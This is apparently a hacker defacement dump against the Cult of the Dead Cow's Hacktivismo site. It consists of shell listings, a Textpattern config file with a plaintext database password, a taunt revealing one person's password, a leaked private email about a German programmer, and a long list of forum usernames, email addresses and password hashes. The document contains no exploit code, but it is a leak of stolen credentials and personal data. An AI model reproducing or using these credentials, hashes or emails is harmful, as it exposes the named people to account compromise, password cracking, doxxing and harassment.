-drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 1 2006 rpc -drwxr-xr-x 10 lairdbrown lairdbrown 512 Apr 23 22:23 textpattern -$ ls -la /home/lairdbrown/web/public/textpattern/ -total 172 -drwxr-xr-x 10 lairdbrown lairdbrown 512 Aug 27 2006 . -drwxr-xr-x 7 lairdbrown lairdbrown 512 Sep 1 2006 .. --rw-r--r-- 1 lairdbrown lairdbrown 264 Aug 27 2006 config.php --rw-r--r-- 1 lairdbrown lairdbrown 638 Aug 26 2005 config.php.default --rw-r--r-- 1 lairdbrown lairdbrown 445 Sep 24 2005 css.php -drwxr-xr-x 3 lairdbrown lairdbrown 1024 Aug 27 2006 include --rw-r--r-- 1 lairdbrown lairdbrown 2954 Dec 26 2005 index.php -drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 lang -drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 1 2006 lib --rw-r--r-- 1 lairdbrown lairdbrown 15127 Aug 26 2005 license.txt -drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 publish --rw-r--r-- 1 lairdbrown lairdbrown 31467 Dec 29 2005 publish.php -drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 setup --rw-r--r-- 1 lairdbrown lairdbrown 5946 Dec 26 2005 textpattern.css --rw-r--r-- 1 lairdbrown lairdbrown 1596 Dec 18 2005 textpattern.js -drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 16 2006 tmp -drwxr-xr-x 2 lairdbrown lairdbrown 1024 Aug 27 2006 txp_img -drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 update -$ cat config.php -<?php -$txpcfg['db'] = 'lairdbrown'; -$txpcfg['user'] = 'lairdbrown'; -$txpcfg['pass'] = 'UjCast4Knod'; -$txpcfg['host'] = 'localhost'; -$txpcfg['table_prefix'] = ''; -$txpcfg['txpath'] = '/users/home/lairdbrown/web/public/textpattern'; -$txpcfg['dbcharset'] = 'utf8'; -?>$ - -And if you are wondering what this douchebag's pw is, it's "cow666". Fuck. - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - -Dear Everyone, I'm an idiot. - -I thought that I was replying directly to Kevin on my last post and it -turns out that this wasn't the case. - -Here's the deal. Hacktivismo has worked on a Web auditing tool based -on "Google hacking" for the past year. Mixter came up with the idea, -and eventually I found a great German programmer named Thomas Gehrsitz -[handle = init0] to pull the whole thing together. He did a great job. -This app works great and is gonna be released in mid-January. - -I asked Kevin some time ago if we could bring Thomas into the cDc. -IMO, he's a great addition; he gets the cDc; and he'd make us all -proud. Kevin thought about it and agreed. But there are also some -special considerations. - -There are some new laws on the books in Germany WRT to "computer -security". These are basically very wide-ranging laws that make it -illegal to do security research unless you work for the government or -a "recognized" security firm. There are also other implications. - -So I want to bring in Thomas but I also want to cover his ass, and -Mixy's too. - -Maybe the German government won't care about the scanner. Cool. Then -later we say that it was Mixy's idea and Thomas programmed it. But for -right now we feel that it's best just to let KrassKat take the -programming credit. - -Anyway, that's the dealey. Thomas is a great guy with loads of -connections in Germany/Europe. We're lucky to get him, IMO. - -I wasn't trying to be deceptive with anyone in the herd, just trying -to keep this "hush-hush" to protect our German friends in case things -might get out of hand in the fatherland. - -L. - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - -hacktivismo users/emails/hashes - -sina_sa:sina@cuodan.net:15e6242e2492acb01426447822e65a1c -daftjack:wordwich@iafrica.com:b72aaaba54e6cda312609cd4a8b26836 -globin:pasa3651@student.uu.se:cdedcbde56a095199166c5755d0363eb -student:sbodine@hotmail.com:20b3e89e3367a41e037c377722565dd3 -Nick:kaisho34@hotmail.com:4d7aed35aee4c84e226b7999e965ae65 -Diavolo_Incarnato:dakritas@hotmail.com:094289043808967c39ace885e1c5d8cc -thop:hoppenjans@mindspring.com:c32d2115a81871cd3653e19a6c13231a -ageing_hippie:ageing_hippie@ntlworld.com:01cbb67b867dd51ba37bd9471a971355 -_Icognitus_:gparaskevas@msn.com:a36beecb76307bd8e0a7681313ca04a3 -ryuroden:taktiktok@yahoo.com:b46c1de1c914eca2dd439388b8422638 -Ordosis:S_o_c_r_a_t_e_s@hotmail.com:70a5d255a4109da344424e6bc9bb40c0 -kripplekid:kripplekid@hotmail.com:0c9acde12187773d46ad8c680a80beb0 -fritz817:gatoloco6969@yahoo.com:9bbb2c76253e60e017a32b88cc471278 -Binsford:schug@triton.net:c7530de588963d134cb4a8d26280dc05 -potato-in-chainmail:kinkbmx72@hotmail.com:e6157adad97e6505cc9d5155bcb4642e -kevroon:kevroon46@hotmail.com:1a9306023c10e64718175db90d238b01 -matrixcheck:mgiese@pcbackup.cc:d833aac27156a15c52b2652b8ab1a30e -Ellis_D_Trippman:ellis_d_trippman@yahoo.com:6ce39a1286766c6a5cc794951ee47068 -kim:kimjak64@hotmail.com:765db88cb41da080d96c416da3487409 -Mordaunt:adam@mordaunt.freeserve.co.uk:907033ec89526796eed42c0a544139e9 -hijohn:jlayfiel@bellatlantic.net:364c9cc8c081d2449a350155e8dcda57 -z00mz00m:z00mz00m@freightmart.com:b2eb5537c26694bbb8e7ea80ceb398ca -ilovecpu:ilovecpu@hotmail.com:8cbae9657acab3cb3b6e160bebcb03c1 -lucval:lucval@stp.i-p.com:ccb60a68d219ebc62bd3037ab776d21a -DAX:randy@homes-oklahoma.com:6b0d3600d50944ab08b6145722eaa7c2 -ita2002it:ita2002it@yahoo.it:e70ae19954e367bbee800ee989082a66 -IrishArmy:digitalsin@evilemail.com:2b9a1819010040037ea921223d8aca59 -saitu:erekss@yahoo.com:5122e9674e06756b1853a10b7c594d59 -thesphinx:srp7@excite.com:02b8e2624c30de45693359985e58a63d -bluemystic338:bluemystic338@yahoo.com:4dca2a7305cc067d43d087be12d4b892 -adis:ftkurniadi@yahoo.co.uk:ac995a1e74a7db4922a13516ab983299 -shin:nshin@attglobal.net:9edc89ea885e996ece2e7841de4d157e -mcandric:mcandric@yahoo.co.uk:d6d4abc346dd34ca670aa5ba3628aa5e -biju:dosth_u@yahoo.co.in:9e1033624305405bd7cc3570364b07e7 -anddreass:anddreass@poczta.onet.pl:d97102a3bd57839d7d0de4354c1216c9 -chin_monkey:pthompson@webmail.co.za:985a7bc9ce31761470ea3d90c456e4d7 -sulina:deadendgen@hotmail.com:a24e94c486bab989710514300ddcd6a0 -clint:clintmetzger@msn.com:9330d1c6bd70a3adbda072853b67cad1 -apaert:apaert@postdienst.net:ab175549688d80c60b1659c4de43a5c8 -petebull:petoral@hotmail.com:ed2b2ddb83623b1827b8a97511051e3b -erkay:gaziebru@mynet.com.tr:4c9d354c48ccac561da2127eea231667 -marjolaine:athasot@otenet.gr:7071ba2626a29a9300c2b825a931c069 -Starless:starless@outgun.com:4b979e519b424172e1082e1b8bb433c9 -careyl:careyphilip@netscape.com:a4988db74a0b5d871c932ee04ab1a2d0 -jgalt:ggiibbss@lycos.com:a2ac914e6552cb03374dd93663cc9303 -ole:kimjakobsen64@hotmail.com:765db88cb41da080d96c416da3487409 -cyt168:cyw@mail.dyu.edu.tw:2776974a83da56929029daa16a8260a4 -rikey:ray999i@37.com:47707eb283d2038207409847bbb72de0 -wjygok:wujianyu67@hotmial.com:649dade25c662747dd75c38dec35a9a9 -speedyko:johnroswell@epost.de:56570591ecb4a3369aa75080561436ee -efect:wikkedselecta@aol.com:eb9c693385dc74868c8a13512e8e0708 -Hiurikas:hiurikas@one.lt:4761593e4b730abeb0d18875a8e9a623 -jamche:jamche100@hotmail.com:826c5375bb0215c25eb6b865c12d63b8 -shangrila:ssrucker@att.bin:21c5a2e00de74edc1c901a5c2d65b84b -Silent_Bob:drclaw22@hotmail.com:76b2396902e77aeb6408d16674d48558 -mysound:mysound@kolaymail.com:4deb43a5e09c8ed21055ab7e1cb81666 -Shailesh:shailesh4all@msn.com:e955a08108c8c104e79e29b9d7410c73 -dare_devil:david_nelwan@yahoo.com:604aca16b4627868812810609bde2171 -RoyDaBoy:slmaniac1@yahoo.com:6297c650426cd725d0e6db7847eded74 -hdarani:hdarani@noavar.com:da12899e721200b9b8e731679d480e44 -Matara:JNR187@yahoo.com:c8b6c849c9eeee695cb3da5a6404dc5b -newromancer:panayiotis.periorellis@ncl.ac.uk:0780eca3dea7c6e77068ac45ac3d7773 -Spike:erfacocero@tiscali.it:a2550eeab0724a691192ca13982e6ebd -dcunha1986:cunha86@yahoo.com:4d06da3d09be27166e2912911ce68b8a -slipknot4o:slipknot4o@yahoo.com:adcd627bde935ae964158e895d12e021 -pal:acffg.fam@ntlworld.com:1ea0be678269bea1e822609ea78a23bc -maizuru:athisaari@lycos.com:c7d596292a7aca075a9960c14a643d6c -redboots:alex@alexandrasamuel.com:5305114469e569d9347d5117e24d98be -Divad:DJHV@sbcglobal.net:a397ca75005ccc5a82e26918ca28a9a1 -Ed2:eddiela@trencor.net:2d72b534c10e379c13529ddd5153b3dc -evan:evansteiner@wanadoo.fr:965d0c759358698d89d947799a6a69b0 -HidDen:densv1@narod.ru:2d932c24b1b2a04ead1970bab8bb48ce -yaw:leecoppon@hotmail.com:c8d6e623803daea4db47e1245026e037 -meynax:meynax@emilios.com:ccee902918dc947321cee4a099895655 -grasshopper:babyfat212@hotmail.com:315eabb98e375838b5ec102d89a649e4 -WhiteDragon:htlongatwork@yahoo.com:bdaab98ba21366413d2acda6ce8451b2 -booka:booka@itl.net:7617e7873255653127cc4ed40ca62138 -danton:danton_87@hotmail.com:94d65e359609cd083e43892013cea91e -Cyberdogg:gr8evil@yahoo.com:496c90dce3d0c2d52c497be55c8eb37d -ew1n:ewin@ajk.its-sby.edu:bda3a12433091091baa1eed0da6a151c -Arthur:Hacktivismo@snazzy.info:37a88971ed90902a4bc29402311ad491 -Sergio:psergii@ukr.net:e19dc27d5b1a7e0115a35441e91b6ac0 -panther_shah:ali4you@ny.com:294cca5bad54185163213c63ed069681 -martin:dismembria@aeiou.pt:2ad28b137a2c6ca7d242b293711bb653 -Tidal:Tidal_@hohtmail.com:9a686275250b484b7273b064bb9c1da5 -shadow_moses:liam@cosgrave603.fsnet.co.uk:24ab2e2939c6507dd38b41e664c10a93 -gide0n:gideon@activalink.com:83136013bc6461be9009b75c6ce74ce4 -kidrickrockford:karlbz@hotmail.com:7c7b1966648e1aad35dcaa7a874e45b5 -mohammed:nicodemosus@yahoo.com:21699a64c12ddb9ceb49e8953cc7a93c -raju:raju-k@postmark.net:04c6b21ee484b321aa057d02db859359 -p4t0t3r0:patotero2@ciudad.com.ar:6503a03866db59dcb8e2131d724d9385 -lilhacker:thugforjugs2002@yahoo.com:aa924c51cc7c37dd71626ba2ddc8aae7 -Fernando21:floiola@terra.com.br:779ca716a1c952062332300a92291436 -nqdiep:nqdiep@vol.vnn.vn:6a9e247e3d07bc65d1493e93c099e918 -mehdi:mehdiii@hotmail.com:0611de2de17472bda5e624aab950eb3e -Justme:mordai@hotmail.com:6ab43ce4c308a6ae25c01681288aabcb -T2F:crazyncool90@hotmail.com:3444e64444838a71200879e6721eb017 -saeed:sayber@mail.com:0694a72e5b84d1871dd1ea41151e9e41 -rat29a:rat@xko.cz:86d9c644052069593a59ad157ed0be76 -capecrusader:capecrusaderU812@yahoo.com:8b540607e91d7e23c9d0698de987a604 -davy:davy@inbound.dk:a66e44736e753d4533746ced572ca821 -gemini:dreamgirl55@yahoo.com:b53e0b662d139663c167d607b95a69cb -rawtool:hhoffman@online.ie:4b569768a52e7e4eb90486758766b6d1 -killer:killer_shadow32@yahoo.com:b36d331451a61eb2d76860e00c347396 -okke:okkke@yahoo.com:e9cd70a845a8440a5b2acd650c2e58e3 -naji:najilaali@hotmail.com:dc92da584c69130809a5592c2620d0a7 -gazza:taffernettleton@hotmail.com:98bccc40ad2e38acc0844057aa43866c -fundoo007:fundoo007@sify.com:cc584d2d5a3909ae602c3811b7c20cbd -red_skull:kumaranuj_83@rediffmail.com:083d8238804d54141035567ad10d36e2 -shadow:black_shadow_bs@hotmail.com:a8134365c85063d17dd2749cb588aecc -trulyindianhindu:trulyindianhindu@yahoo.com:eb30e09820d47b348ee3653c6a9766bc -anshu:angieurani@hotmail.com:99aab546e03cd12b46505ee92980c8b4 -mido:amilton_mido@hotmail.com:9c58e4d058c3a06485b5be2b3105bdd1 -monu:gkverma@zeenext.com:9c6b4a02e55c5e703b5b3368d44d7125 -Jackal:iimarinen@aol.com:17da736c36454bd8a2ad56687b1ad30d -lornius:too_much_time@zapo.net:36e7744dd3a13b2247321bd1432bd5a3 -amigo:manodz@port.ru:a5b954c58470a2499dd4cbd74a2599e4 -annu:anoop440@yahoo.co.in:5db708539c10e854477a8b6e4e740a3d -Clad_the_gamer:clad_the_gamer@hotmail.com:ca4bbcaae5878507ba842c8311bb88eb -ebijl:ebijl@attglobal.net:dc9644abce4127c320774731954866ab -charog:stan_is_las@hotmail.com:50b927c7d21088b1b1620567aa3755b1 -unzipper:dmfagan@eznet.net:158939b55b7981a76550ce43c178d8d0 -arsy:arun_bit_11@indiatimes.com:b32b928779b56bc33223344de6a0b1e8 -Dawson:Dawsontitanic@hotmail.com:c005ed80db775ab83e7a5396a2070a93 -wurzeltod:susanne.gerber@stud.unibas.ch:e19052ce5399e17e74c1634eeee75ea1 -Farang:blake@inet.co.th:555580b376494edc90a7a222ee58bd8a -the_kinner:the_kinner@mirkforce.zzn.com:a4529b616c84e027bc88b4793d5c78be -onikage:onikage46@lyos.com:b12875b3d9e6918c66361aac27017858 -Terminux:k9industries@hotmail.com:5bd042e0aae6cd90edb86703953b513a -rich_nw:richardsspooner@hotmail.com:e7e04517642e0b9545980609e7bca9d7 -bsponaugle:spam@sponaugle.net:448014e276022ba2e9634b621b4999ec -sinan:sinan_tashaka@abv.bg:81dc9bdb52d04dc20036dbd8313ed055 -age:agecell@yahoo.com:0a25754e78ca82877190e21461d3dc86 -Crazybob2002:robert_gosselin@hotmail.com:d0ca6d5ba55b4321e5b0b78962c1c381 -misterhead:connsm2000@yahoo.com:0b518b5c7060b74bbb6b44912c35ba1c -luckydog:luckydog@hacker.am:927e2ab6868071761e66e866d4ae94e0 -dekthetek:batman90120@hotmail.com:3eacde7977aa49a37c9aa8bbc17cd905 -Nemesis2714:nemesis839@lycos.com:b7c255e01872be42eecd33db2b4819da -sulliga:badacows@yahoo.com:9986ce4b806b9dd5433eddd36ed71b4b -sh4dow:leandro.lopes.rosendo@bol.com.br:c3a20cb951e3d83c0ccc77981a094b9c -Mino7aure:mino7aure@portugalmail.com:de679b8a1b71bdb6531a9998c23c1674 -thaolx:thaolx@gmx.net:0603d1caa7718cbd3e39093027b77c3b -CapsLock:pedro.virtuoso@clix.pt:9e31841413a812296abd8ed6a6d7db18 -ANUBIS:Techwolf@TechEmail.com:433d38db0d0a2e01398b439be7a79642 -emin:eminemmi@hotmail.com:801b97d5c1d11307d20cd81d7489cd3d -forge:forge737@hotmail.com:b43b770788d71abc92442cc450c4c966 -chopchopwhitey:idiologic@graffiti.net:88e40e053d8bcaa9cea08d885281b4c2 -amseysakshi:sharmaamit2002@indiatimes.com:529423b1ebd493e7760a8a22c2b19141 -PhiberOptic:phiberoptic@ig.com.br:823299e0dbcad6c1e15131c322905248 -karloff:sth1300@msn.com:428c2eab4c4bba2c06879d0be7b9eb90 -satan:mysatan2000@yahoo.co.uk:140e85d8064cd4155533dbb883993c97 -devil:hackjack11@yahoo.co.uk:3c2c4a8331c0d2d0a5bedbbea5d00e50 -rocknrick:rcknrick52@hotmail.com:9b2475c71dccdb6bb03bcc233e76284d -inedible:crazy_cybersurfer@yahoo.com:1a100d2c0dab19c4430e7d73762b3423 -693102:t693102693102@yahoo.com:1765636ee1939d443a16570330e57123 -smoothcriminal:mxshankara@yahoo.com:9027e3738048478ec1048657b3168e28 -junkyarddog:hood7782@hotmail.com:7aeacc7a2d01742cba631eae4152dae0 -masoud:mpanahi20000@yahoo.com:49d69a48b032226a4ec109ac63ee263b -ORENDO:orendo_@hotmail.com:61350c8918a7748894e46936ea974ecc -ShazBot:shazbot@subdimension.com:0ee25054037408436daa3d5d955dca2e -Zero_Cool:drkmonkey@ffradio.net:d81e22674cc2c1c62b84500e436e6ad8 -supergutt:tor.kjemo@telia.com:c263520ba903c035e591d1b0a56a8435 -elephant_cult:skgrimes@knology.net:3be541319e5b1651ac25191cece7ea54 -tmssol:tmssol@chollian.net:934654d72962041a2b0e55c201d99771 -Al_Aquhart:nainross@yahoo.com:4ee48483035aab781a9e3ac633c80168 -shaiju:shaiju15@hotmail.com:dd3961a6860bd692642196d84790c689 -mimo2egypt:king__net__2003@hotmail.com:1ea0be678269bea1e822609ea78a23bc -Gitar_:ferit@ferit.tr.tc:9aa61152e1b52d26361b452dc24134a9 -Antvir:antvir001@hotmail.com:d41219060e0c16c228ed4682cade6379 -HyPeR-AcTiVe:sms99@hotmail.com:48b1043998262b44c792cb811377b3c9 -Fatman:braun@netvision.net.il:5758a5dbe29683c02439699437e70294 -PaTo:zook@candw.lc:3658cb9715ca765557542579832e5988 -Atlas_youth:dynamic123ma@yahoo.com:1d27045ec72ba30a1002a731a44aaa78 -SharpDog:SharpDog@MailShell.Com:adc068be0dd4724e3b09215186a76d75 -mik2kad:mik2kad@yahoo.com:e14e93454e7aea9078e01b4c012c7671 -Konferus:caffeinefreemsg@aol.com:b412ae9492d862533585e8468d7bc98a -ITChalemagne:IT_Charlemagne@hotmail.com:582bd5a25ab7db0d2269911d094909c2 -Boozion:boozion@exo.com:313eab97265535524bec488b6baa9b68 -Bad:kate@lonestar.com:3ec93dd862e99750d83d6c2062515816 -mara:mara1970@hotmail.com:a17737dce59d6024254bac19623d92c8 -patilsan:patilsan@hotmail.com:942746446030aed86d3b21dbddb9786a -boriskarloff:joanne355@yahoo.com:a2dc3c5359b3ad77aec44b3a1278c92a -cuz:bcuzd@netzero.com:aa1c22bb8d8b1c13cdb53d89d80e8150 -igor63:igor63@libero.it:1b89a4dee1e0186479a3b180766da4c8 -cclinux:linux@ecplaza.net:82c3ee7e972736d9ce07d0081c31d3d6 -Philter:brian150iq@hotmail.com:ee9ba8ba14eeb51354468e72288a036a -alysh:alysh6000@yahoo.it:56553554d37dca7d997531ee3ce876c8 -Mr_Fece:Mr_Fece@aol.com:03a1456beb2d0029e4265a72560973b6 -wonkyu:won1677@nate.com:9274479da21cd758ae3b12a5e1c9bb49 -slapper:ebm_gigolo@yahoo.com:d0e94db22c12e0a6ad9b93510d5e4ab7 -algaidaman:algaidaman@comcast.net:6e7b340a32d88421a12068d53ad14198 -Bryan_Mcandy:kiss_hand@yahoo.com:5450e638d34b5e586a5661cb21be48a0 -_DeMoLiTiOnboy_:sousahotboy@hotmail.com:ee442887a489b2b34b687001b8384ce9 -MrFreeze:MrFreeze@avsc.com:1813449ad30b90ba98d5193321a205bc -ibtermite:webbrat@hotmail.com:51b7457ddee747c21231e752147cae0c -ELEKTRIKMESSIAH:elektrikmessiah@msn.com:0e70056b87e837a04a3d8c9c272ae644 -JungleBunny:CCCP666@list.ru:d0b40991202d40cce2b4015d3260ceec -Andy:andy@mail.ru:b9247b26bdc8ab38cb35e95942829100 -SoliD:almpatros2001@yahoo.gr:2a691b6a3d56d8a115c1d7490a632d62 -doomep:doomep@terra.com:36957a0ad83d202a0d1d665673524648 -ultraman:www.essentualus@yahoo.com:9ac8090317536e6366d9e9480ecbcd22 -azteca:alamzero@yahoo.com.mx:1ac0d72d238c86b2029c8419ba2574a2 -Dewil1:Dewil1@azet.sk:3ac2c253d5dd44b85a98318aa7a4b35d -venkat:venkatesh64@yahoo.com:8858d813b826ab499728dd93cc5833e8 -tot:ashley_tomlinson@talk21.com:698777432d4b6352e008a1d267329aa1 -IconFace:IconFace@hotmail.com:51c7858e0bdd75825edc7e8782412547 -elgreco:elgreco17@lycos.com:14acb10c792d6e7a1ea2b0e0b567c69b -higherprimate:sampost@shaw.ca:d5aa1729c8c253e5d917a5264855eab8 -payman:paymanyarandi@hotmail.com:2d1850952cae65285d68c36755a98d9b -beatnikmao:beatnikmao@yahoo.com:81dd6c3a774797876d660198a9e27994 -Sblade:skye_wing@hotmail.com:187bbbd2be338c0257962701251945ae -manokb:dee@africaonline.co.zw:9254d39e4400a502d63895bb07410211 -ArfurC:ArfurC@aol.com:75a0e56dee8278885e2a974e6cda05a8 -denniseng:denniseng@hotmail.com:937d2a9585583994ed038743d5d20452 -Bhvg:xenofex@linuxmail.org:0e83d3ca265c9ab701515372873011c9 -Sk1tz:sk1tz@mindless.com:92eed1ae4e1c1484c5baa67e7298072b -uwf:ulco_f@yahoo.com:220531d613ca031777c7d89b932c9b50 -Raven:psychicspy@tiscali.co.uk:10c58033e612286ab6d4335a0c9956ce -datatypex:razor143@hotmail.com:e7ea773732d29167747392eaeb51c3c6 -han:han118@plasa.com:4964ac46464247b882655c11d1dbb7c7 -canguro:facher03@hotmail.com:636c3b5aa1c347221ae2c5ed5e6ad806 -jimiandjimi:jimiandjimi@aol.com:1c5442c0461e5186126aaba26edd6857 -ForcedEntry:forcedentry@lorderazer.com:55bcad9a6070c77d946a4441d184245d -Night_Elf:janmadsen1984@hotmail.com:49de77cada6633b87b46a9eee9853356 -dekrypt:dekrypt@hackslack.com:661a886415c5c88b372b4d5ec8c0c31c -Unity:potofhash@hotmail.com:84ea7a8c738551ba64d122e664347260 -BigEasy:blah640@lycos.com:b92a5675b25985422a1d7a358a285b7a -leo1:leandros1leo@hotmail.com:560e5b818836d5bd983d9cce8db58944 -Cairo:caironet16@hotmail.com:2eaaec7699aabeb9ec8c52a44b7c61c7 -tgbardelli:thiago.bardelli@sisinformacao.com:457062296703511ad0797671262d0189 -blackjay:blackjaym@aol.com:431e0be96400661506ca0d6656d21838 -jb80:jfbgod1@aol.com:e09a1c37b0020460a6c47ee106003c10 -vklake:vklake@hotmail.com:1ea4e9648192eccd4d47e9950ec433c9 -ErSie:tomp-raider@web.de:9c1bbb0a66a7b0c578cdb398ec2cda7a -primeEnigma:celeritas_2@hotmail.com:78d5de6170918bcc5325b8cabad926d2 -xzeginx:r3v0luti0nary@msn.com:1da287629ed4dc71b93ddc5ec0ea2146 -gagg:uytu6tuytry@freesurve.com:5d321e8d937c94dadb0c853717ad199d -estrella:estrella@hackindex.org:ea278576e794c699919784538ec971a0 -BigEasy108:BigEasy@yahoo.com:8083bb7c2ce3993875a417a901c877ea -korib:korib@lfcmail.co.uk:6c0043ea465881c5b05380020db9b5d5 -donjuan1013:donjuan1013@msn.com:262059ab76da9e68c0eb7a6c96e62e42 -Eddie:luizeduardoamaro@ibest.com.br:51366cb42d2c571e7c5aa11c17d35d79 -llaur:rblarry69@yahoo.com:2b2126a35999ac28e52a0c7a7078ba3d -MrSmith623:evilorange623@yahoo.com:b201458565802983082a0230db0b134d -casualdeath:draconicvampyre@youareadork.com:16e2310775304aa6bd4564e1155c12ec -wickedhacker666:dominquedavis@lycos.com:87497d51e9adad54e8343032ae243936 -rrigginsa:linfalis0@yahoo.com:49cca9acc01ac9b12b5d929ce294e8a0 -lethalvariant:variant@sdf.lonestar.org:d09abb2c9c732aa670da4b3a22389ece -Systmhckr2k7:imnate42@hailmail.net:1d5130255c6168248caa28c0a505ad1a -craysandcrab:raysandcrab@verizon.net:e1a5b5be90869c04ea52626723b373aa -info:infoboite@yahoo.com:774b14033e26e67bbabb92a1c43e4295 -HACKERPRINCESS:WWW.HOTBABY0006@YAHOO.COM:a9a3db05e8e89569d4e0c79e0dba2b80 -zero:mario.wallner@freenet.de:355edd9e85e0198a0045d39b830be631 -klumsy:munchkinism@hotmail.com:52cd30b33ca86266a8bb8baa6532dc75 -nasa:nasa_h@hotmail.com:3c9692819c14bb99124637b1c0811914 -goz:gozp@comcast.net:2a9a9e88ab4c74965d74ccdb7caed002 -mad:tshepo_alidi@yahoo.com:1814123e10ea8b678645eb7eea15b938 -MEtal_Demon:psycop@freemail.hammerfall.net:7baa6d93380e30bd4a30d83c977d505b -psychedelic_discernment:j_on_e@hotmail.com:84cb4bd20e3be7b8120c1ced22b8428d -Adonai:Lormanthe@Rogers.Com:0da12844e069ec6b2a7104681187cd9c -Silencer_:silencer@333.org:b1b281b078728c98695910bbd1e0eb70 -viva:vivabizness@yahoo.com:437198d42d236088b6d1ec435710a123 -JETS:JETSUI@YAHOO.COM:90954349a0e42d8e4426a4672bde16b9 -viola19:viola19@telkom.net:d7426306a160a63d91c92cd9e0d32893 -icyfingers:jesumanictrauma@yahoo.com:ee12e47ac20bcc315387e8e1ac16336e -joe:dcely@latinmail.com:ca55ae213a67cd0756d64dd71ce31b7e -Ivanzinho:ivanzinhotrash@hotmail.com:523ae85546a004173298ee37178c8d8a -calm:philip-axl@yahoo.com:58b21dc1b9623e054cadd7a6027e757a -MaDSkillZ:madskillz_2600@hotmail.com:0233bb435715937765cad9ec6a260128 -htnt65:htnt65@fakeemail.com:b8b607053d98a59e61c29028bc4b907e -Deathwish:Cs_Sh_3@hotmail.com:6cca1a4895c1b676bce4ab3015b4630b -bluepimpernel:djd53@optonline.net:c00b448520699c9e5d9899de62cea659 -fuad:ashikinku@malaysia.st:4ebc7c202708bead975c3547114c0d9c -troyphoenix:troyphoenix101@yahoo.com:691ac91a0c1059b20d253ebbd0577239 -yeodar:yeodar72@hotmail.com:176e299c4005ad143d8e00ee9b260168 -KID:picasso_br@hotmail.com:aea86db32575a443e7094daa12500b72 -LUIS:LUIS_MATICA18@HOTMAIL.COM:3da8118a9b91b4d8d929775e1a00edcc -KraM:laminakram@yahoo.com:98c0d2530b126b5439bcc3e4b0859719 -p3nsiln3ck:pample@cyborgclan.zzn.com:8c8dab0751ed067ceac7ac629edea754 -lilsmcg:fake@aol.com:692037750d530481c6c0b68c3d539c9a -Amirrasha:Rasha_malek@yahoo.com:e9d527c41bddd362d3747d2e7c5215e5 -necroped:kre8tivekztmz@yahoo.com:da17b69deb263557aec0d077c928656e -maskejc:maskejc3000@yahoo.com:77073ed9b6aba4be86bee498ee345047 -eYep0k3r:eYep0k3r_88@hotmail.com:a6e609ca29b43d9b11d3e586e848d184 -Krash:KrashAngel@yahoo.com:87bce440b85e0d833e284ea16b1142c5 -Malek:manzarek27@hotmail.com:551c6ac8dd23b6d854a3bd22123776b7 -stickdrag0n:www.deathace1856@yahoo.com:8781571a7a1e1e2c40649a0737e637a5 -Crypto:cryptocr4ck3r@yahoo.com:6eb111056db9bd033c7c65604aa2200a -stamen:oditcom@hotmail.com:78bd8c03a7c3293a7c6d2a6c4b88ca61 -iRus:kaka2126@yahoo.com:85467ad9e08b19348610b53c875c1c01 -rahman:Nova@krify.com:53041620bdb8a2994d2eee40783c220a -inkeastwood:inkeastwood@hotmail.com:8de2123caaac5dc3ba0015a1569c6807 -silence:s.mielke1986@web.de:543ec97ee0b84c43677852e7c20a3d5a -Noz:some_interesting_guy@hotmail.com:29510a2b9d9ccebd803e5591534e4cdd -kath:kathforever@yahoo.gr:630182b5e929ee00414e44c92bcd5699 -hansdampf:vitalace@arcor.de:4385ae819d0108e5627dd4a46816e8d5 -manhvt:manhvtr@hotmail.com:ca36dc5edc2ae3c4394e90596b8d52b9 -freya:ariaferlo@hotmail.com:b803e6eec2e1c8c996421a6839c1bcbd -pountaar:kpurdy@4j.lane.edu:c4c48364a4ab1d2c448c717281d77b6e -morteza:morteza_razi@hotmail.com:1ad9e2d2888304976b5a48a5a931d0a2 -boxit:snailmail222000@yahoo.com:c6a38c3eace6771651340c7a2981e277 -Fr33_M3h:programmer43@hotmail.com:67a82bac89ebaea7489e2d41819b31ee -djtavo:tavo483@yahoo.com:a5c039e09e21873448ced10d06966957 -Gus922:gmaltez922@aol.com:bc8535a3d93bcda5ec2db45717e3e730 -vsf:vsf815@yahoo.com:9b9371b29ca842abe8bdc60a82370077 -Anabel:afrank1108@hotmail.com:c368dd0ee66aec633c694db27c6a363c -munki:mv@skware-1.com:db1ce22902968e379bc6473547d02e75 -Devtrix:jdev.petko@att.com:cb34cb5031c75092445743e32481abdd -TechnoSin:technosin@hush.com:118eb3ec6a079cd016bc7d1aa5eab997 -malex:anec@bk.ru:c1b81244a376734496d6a218781644b6 -eaplum:eaplum@planet-save.com:117ee9b575624d456aa57998399a6267 -stagadag:stagadag@hotmail.com:85e649d0e81bcbcbecb9d5d1918d0e08 -dnyanesh:dnyanesh_kardore@yahoo.com:99aa6ae7397a5c8cbb111c2c016c7242 -Crash_override:evannash@mail.com:50d4e2b0553249c6e537c3331d85a376 -cyberhonky:pope_man@hotmail.com:89acc1085d4d815aa2c380491a64a921 -ypwhich:ypwhich@paunix.org:538034a881ce4b05a69d75b42e05ca01 -halo8:thebecominghalo8heresy@yahoo.com:0ece51b79e090b1d4986b15a48cd38e9 -m5phil:phillip.jones@halliwelljones.co.uk:c753ee34bd4d406c49b174e806129465 